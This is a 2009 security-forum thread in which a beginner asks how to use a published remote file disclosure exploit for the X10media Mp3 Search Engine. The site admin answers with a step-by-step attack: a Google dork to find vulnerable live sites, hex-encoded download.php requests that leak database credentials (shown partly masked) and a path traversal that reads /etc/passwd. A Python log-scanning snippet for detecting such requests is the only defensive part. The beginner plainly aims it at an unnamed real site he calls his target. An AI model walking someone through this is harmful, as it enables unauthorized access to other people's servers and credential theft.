Waraxe IT Security Portal  
Help the noob with "art of exploiting" xD
Arxi (Beginner), posted Mon May 18, 2009 8:57 pm

Hello guys. I found this forum to be very supportive for newbs in exploiting.

Here is an exploit for the x10media script, with instructions. I don't get the first part where I should encode the URL. I ran the script in cmd and all I get is "text copy" and nothing else. I am really a noob with exploits and I need help with this =)

A few questions: Should I keep the site open when running this PHP script?
Am I doing it right if I type in cmd >"php folder" then php expoit.php ?

I still have a lot of questions but I will save them for later xD

SCRIPT AND INSTRUCTIONS:

################# ~THUNDER ################################################################


~X10media Mp3 Search Engine v1.5.5 - 1.6 Remote File Disclosure Vulnerability

~Found by : THUNDER <t4h[at]hotmail.fr>
~Dork: "This search engine is in no way intended for illegal downloads. "
~File : Download.php

===========================================================================================

to read files you need to encode the url, so you can use this php code :
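<?php
// Encode URL ** THUNDER **
// Returns the input string as hex, two digits per byte.
function enc($string){
    $hex = '';
    for ($i = 0; $i < strlen($string); $i++){
        // %02x keeps a leading zero for bytes below 0x10
        $hex .= sprintf('%02x', ord($string[$i]));
    }
    return $hex;
}
// Read the string to encode from the "t" query parameter
$thunder = isset($_GET['t']) ? $_GET['t'] : '';
echo enc($thunder);
?>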

How to use : http://127.0.0.1/encode.php?t=[Url]
Ex : http://127.0.0.1/encode.php?t=includes/constants.php

##### ~Exploit ############################################################################


http://www.target.com/[path]/download.php?url=[Encoded url]

Example :
let's download the constants.php file which contains the database login and password.
the file will be downloaded with the .mp3 extension.

http://www.target.com/[path]/download.php?url=696e636c756465732f636f6e7374616e74732e706870

Open the downloaded file with any text editor, and you have the database.



###########################################################################################

Hope you can help me =)

waraxe (Site admin), posted Tue May 19, 2009 11:55 am

First of all, you must search for an exploitable target. Use the Google dork:

http://www.google.ee/search?hl=et&q=%22This+search+engine+is+in+no+way+intended+for+illegal+downloads.+%22&btnG=Google+otsing&lr=&aq=f&oq=

And try the example from the exploit against targets till you find a working one.

http://www.p****d.com/download.php?url=696e636c756465732f636f6e7374616e74732e706870

Download that file and look inside - you can see database credentials:

Code:

/**
 * Database Constants - these constants are required
 * in order for there to be a successful connection
 * to the MySQL database. Make sure the information is
 * correct.
 */
define("DB_SERVER", "mysql.***com");
define("DB_USER", "p***d");
define("DB_PASS", "V***9");
define("DB_NAME", "p***");
define("DB_LINK", "db_link");


Now you can download other files too. Let's try "/etc/passwd".
Open encoder:

http://www.waraxe.us/sql-char-encoder.html

enter "../../../../../../../../../../etc/passwd" and hit "Encode now!".

Look for "MySql hex-encoded string":

Code:

0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764


and just delete first two chars, so that you will get this:

Code:

2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764


Then use it in exploit:

http://www.p******d.com/download.php?url=2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764

And you get what is expected:

Code:

daemon:x:1:1:Owner of many system processes:/:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/false
man:x:6:100:man:/var/cache/man:/bin/false
...
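
For anyone defending a site that runs this script: because the `url` value is hex-encoded, the request line never contains a literal `../` or `etc/passwd`, so a check has to decode the parameter before inspecting it. The following is an added example, not code from the thread or from X10media. The log format, the sample lines, the function names and the assumption that a legitimate value decodes to an http(s) URL ending in `.mp3` are all assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate value decodes to a remote MP3 URL.
ALLOWED = re.compile(r"^https?://[^/]+/.+\.mp3$", re.I)

def classify(hex_value):
    """Decode one url= value and return (verdict, decoded_text)."""
    try:
        decoded = bytes.fromhex(hex_value).decode("utf-8", "replace")
    except ValueError:                      # odd length or non-hex characters
        return "malformed", None
    if ALLOWED.match(decoded):
        return "ok", decoded
    if decoded.startswith("/") or ".." in decoded.split("/"):
        return "traversal", decoded
    return "local-file", decoded            # anything else is not a remote MP3

def scan(lines):
    """Return (client_ip, verdict, decoded) for suspicious download.php hits."""
    findings = []
    for line in lines:
        m = REQ.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if not parts.path.endswith("/download.php"):
            continue
        for value in parse_qs(parts.query).get("url", []):
            verdict, decoded = classify(value)
            if verdict != "ok":
                findings.append((line.split()[0], verdict, decoded))
    return findings

def raw_signature_hit(line):
    """Naive check on the undecoded request line, shown for comparison."""
    return "../" in line or "etc/passwd" in line

def _line(ip, target):                      # builds one constructed log line
    return f'{ip} - - [19/May/2009:12:00:00 +0000] "GET {target} HTTP/1.1" 200 512'

# Constructed sample log; IPs are documentation addresses.
SAMPLE_LOG = [
    _line("203.0.113.20", "/download.php?url=" + b"http://media.example/song.mp3".hex()),
    _line("198.51.100.7", "/download.php?url=696e636c756465732f636f6e7374616e74732e706870"),
    _line("198.51.100.7", "/download.php?url=" + ("../" * 10 + "etc/passwd").encode().hex()),
    _line("203.0.113.20", "/index.php?q=test"),
]
```

`scan(SAMPLE_LOG)` reports the two requests from 198.51.100.7, while `raw_signature_hit` matches none of the four lines.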

Arxi (Beginner), posted Tue May 19, 2009 12:26 pm

Pretty nicely written, but I STILL don't get how to encode the URL (embarrassed)

Here is what I did:

I run my xampp
I type http://localhost/encode.php?t=http://www.****.com/ (www.****.com is my target)
And I don't get anything.

I know I am quite boring, but if someone has a few minutes, please help me

waraxe (Site admin), posted Tue May 19, 2009 4:05 pm

Arxi wrote:
Pretty nicely written, but I STILL don't get how to encode the URL (embarrassed)

Here is what I did:

I run my xampp
I type http://localhost/encode.php?t=http://www.****.com/ (www.****.com is my target)
And I don't get anything.

I know I am quite boring, but if someone has a few minutes, please help me


You got it all wrong :)

This security vulnerability can be exploited manually. You only need a web browser. That encoding script is just an additional, optional utility. You can encode with that script, manually with an ASCII table, or with the SQL encoder, as I showed before.
And you have to encode the path of the file you want to download, not the website's URL!
By the way, it seems that you have no clue even about this exploit's possibilities. It's a remote file disclosure exploit, right? It will allow you to see what's inside the files residing on the target server. This type of exploit can reveal potentially sensitive information, but usually more steps are needed for an effective attack.

And one more thing - don't post sensitive info here! That includes target URLs!

Arxi (Beginner), posted Tue May 19, 2009 4:33 pm

Gosh, I just found the hard truth :'(

I don't even know what this script does.
Anyway, thanks for the minutes you spared to help me
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"